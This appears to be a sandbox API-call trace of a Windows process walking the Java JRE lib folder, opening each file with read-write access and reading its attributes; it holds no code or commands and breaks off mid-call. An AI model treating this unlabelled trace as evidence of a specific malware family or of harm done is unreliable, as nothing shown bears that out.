[0097.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 53 [0097.530] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.530] GetFileType (hFile=0x360) returned 0x1 [0097.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0097.530] CloseHandle (hObject=0x360) returned 1 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.534] AreFileApisANSI () returned 1 [0097.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76110 [0097.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 53 [0097.534] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1082)) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0097.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.534] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x997, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="logging.properties", cAlternateFileName="LOGGIN~1.PRO")) returned 1 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0097.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0097.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0097.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0097.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0097.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0097.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.535] AreFileApisANSI () returned 1 [0097.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties", lpUsedDefaultChar=0x0) returned 58 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0097.535] AreFileApisANSI () returned 1 [0097.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0097.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0097.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 58 [0097.536] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.536] GetFileType (hFile=0x360) returned 0x1 [0097.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.536] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.536] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.536] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.536] CloseHandle (hObject=0x360) returned 1 [0097.537] AreFileApisANSI () returned 1 [0097.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0097.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 58 [0097.537] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.537] GetFileType (hFile=0x360) returned 0x1 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.537] CloseHandle (hObject=0x360) returned 1 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0097.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.538] AreFileApisANSI () returned 1 [0097.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0097.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0097.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties") returned 58 [0097.538] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x997)) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.539] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1389711, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="management", cAlternateFileName="MANAGE~1")) returned 1 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0097.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0097.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.539] AreFileApisANSI () returned 1 [0097.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management", lpUsedDefaultChar=0x0) returned 50 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0097.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.540] AreFileApisANSI () returned 1 [0097.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45e18 [0097.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, 